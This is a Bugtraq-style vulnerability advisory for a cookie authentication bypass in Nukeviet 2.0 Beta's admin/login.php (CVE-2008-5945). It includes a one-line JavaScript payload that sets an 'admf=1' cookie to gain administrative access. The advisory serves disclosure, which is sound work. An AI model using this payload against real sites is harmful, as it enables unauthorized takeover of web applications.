Nukeviet 'admin/login.php' Cookie Authentication Bypass Vulnerability

Bugtraq ID:	30681
Class:	Design Error
CVE:	CVE-2008-5945
Remote:	Yes
Local:	No
Published:	Aug 13 2008 12:00AM
Updated:	May 07 2015 05:24PM
Credit:	Ciph3r
Vulnerable:	Nukeviet Nukeviet 2.0 Beta
Not Vulnerable:

Nukeviet 'admin/login.php' Cookie Authentication Bypass Vulnerability

Nukeviet is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.

Attackers can exploit this vulnerability to gain administrative access to the affected application.

Nukeviet 2.0 Beta is vulnerable; other versions may also be affected.

Nukeviet 'admin/login.php' Cookie Authentication Bypass Vulnerability

Attackers can exploit this issue via a browser.

The following example JavaScript code is available:

javascript:document.cookie = "admf=1; path=/";

Nukeviet 'admin/login.php' Cookie Authentication Bypass Vulnerability

Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].

Nukeviet 'admin/login.php' Cookie Authentication Bypass Vulnerability

References:

• Nukeviet Homepage (Nukeviet)